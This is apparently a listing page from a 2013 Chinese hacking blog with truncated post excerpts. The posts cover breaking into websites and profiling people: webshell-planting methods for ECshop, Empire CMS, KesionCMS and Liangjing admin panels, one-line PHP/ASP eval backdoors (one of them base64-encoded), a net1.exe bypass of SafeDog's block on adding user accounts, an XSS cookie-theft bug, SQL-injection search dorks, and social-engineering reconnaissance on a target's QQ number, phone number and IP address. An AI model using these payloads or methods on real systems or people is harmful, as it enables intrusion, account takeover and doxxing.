• 分享个人的一些社工思路

    分享本人的一些社工思路吧,社工是一个很强大的入侵方式,下面我就分享一下本人的社工思路吧。 1.baidu google 搜目标的QQ号 常用ID 电话号码等等与之有关的 (可以得到一些有用信息后在加以扩大搜索范围) 2.完成第1步时基本会出现一些有用信息比如:贴吧里可以得到 (IP地址  毕业学校 出生日期 爱好的游戏 邮件地址等等…贴吧是个好东西) 3.通过QQ空间 其它交友博...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:社工相关, 黑客技术, 黑客攻防 | 暂无评论
  • ECshop商城系统后台拿webshell方法

    之前,网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站 看了一下,ecshop的  直接用exp 爆出了用户名和密码.. 接下来 就该拿shell了 在网上搜了一下, 看到了不少拿shell的方法 都试了一下,但是没有一个成功的  应该是都补上了. 群里一朋友 给介绍了一个思路 试了一下  竟然成功了 不多说了   ...阅读全文
    作者:qxz_xp | 发布:2013年10月17日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 新版安全狗 添加账户存在绕过问题

    新版安全狗 4.0.05221 添加账户存在绕过问题 经测试发现, 1.安全狗只是针对c:\windows\system32\下的net.exe做了限制,net1.exe可以正常使用,使用方法为:c:\\windows\\system32\\net1.exe user 账户 密码 /ADD, 注意下,这里是双斜杠。。。单斜杠是无法使用的。。 2.安全狗貌似采用的是黑名单的方式,只是限制了net.exe,再其他目录下,将net.exe改名为任意名字,可继...阅读全文
    作者:qxz_xp | 发布:2013年10月15日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 帝国cms后台拿shell两种方法

    第一种方法:  增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马内容复制进去 保存后再管理页面单击就可以进去看到你的马了,一般在网站根目录下面。 第二种方法: 导入新型模块(6.0上实验不成功) “还是几个月前一个朋友让我看看帝国进后台能不能找到简单点...阅读全文
    作者:qxz_xp | 发布:2013年10月07日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • wordpress插件StatPressCN存XSS跨站获取用户cookie

    statpresscn是流行的wordpress站点统计插件的中文版,虽然已经很久未更新,而且wp官网统计也仅仅不到10万次下载;但因为这个插件被某国内wp托管服务商(对方宣称拥有数百万用户)作为内置插件被默认启用,所以危害还是有些大的。 在统计页面中,可以详细记录站点的每次访问。其中流量来源展示时,提供一个表格输出来源网站,而statpress的中文版未进行字符串过滤直接输出。...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 帝国cms7.0 后台拿shell两种方法

    帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码。 首先进入后台 第一个方法:点击系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型” 如图: “导入系统模型”,可进入“LoadInM.php”页面。 如图: 在本地新建一个文件,文本内容为<?fputs(fopen(“x.php”,”w”),”<?eval(\$_POST[cmd])...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 织梦dedecms变量覆盖漏洞的利用方法

    最近的那个dedecms变量覆盖漏洞,最后可以控制全局变量,但不能完全控制 $GLOBALS[$v1] .= $v2; 注意这里是递加的,是在已初始化的全局变量内容上再递加内容。 现在已公开的漏洞利用方法是控制cfg_dbprefix全局变量里的数据库表前缀,然后再用ExecuteNoneQuery2点进行SQL注 入。不过这个点只能update,要直接GET WEBSHELL,需要mytag表中已经有记录,再update normbody字段...阅读全文
    作者:qxz_xp | 发布:2013年10月05日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 网站注入关键字总结

    PHP DORK inurl:(0x3a,version inurl@version,0x3a,databse) inurl:(user,0x3a,pass) inurl:+union+select+ from inurl:+union+select+ pass inurl:+union+select+ SHOP inurl:+union+select+ admin inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= ...阅读全文
    作者:qxz_xp | 发布:2013年10月01日 | 分类:菜鸟入门, 黑客技术 | 4条评论
  • 良精南方数据后台插一句话拿shell方法

    良精后台网站配置插入过安全狗的一句话:”%><%Y=request(“hacker”)%> <%execute(Y)%><%’ 这一句话木马是过安全狗的有没有安全狗都能用,但在你不知道网站有没有安全狗的情况下最好就用这个,不然插入普通一句话后config.asp文件就被狗杀掉了,然后网站就挂了。 一句话木马位置:www.xxx.com/inc/config.asp,密码hacker,用中国菜刀...阅读全文
    作者:qxz_xp | 发布:2013年9月27日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 帝国cms 6.6后台拿webshell方法

    进入后台后点击自定义页面-增加自定义页面-随便写了qxz.php文件名,页面内容填写,<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script> 如果内容直接添一句话或者php大马是没有用的,,因为他会生成qxz.php前先给你执行!! PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST[‘cmd&#...阅读全文
    作者:qxz_xp | 发布:2013年9月27日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
  • KesionCMS后台直接拿shell教程

    以前就有人公布过拿shell过程 今天再给大家具体演示一下 KesionCMS V6.5 拿shell! 演示网站:www.xxxx.com 直接打开后台 admin/login.asp 一般默认密码:admin  admin888 认证码 8888 下面看我的截图操作: 上面搞完后点击促成生成/1.asp/目录 我们再添加一个静态标签  直接把一句话加上去如图 上面全部搞好后点击保存标签 然后自己添加个自定义页面,名字什么的可以随...阅读全文
    作者:qxz_xp | 发布:2013年8月14日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论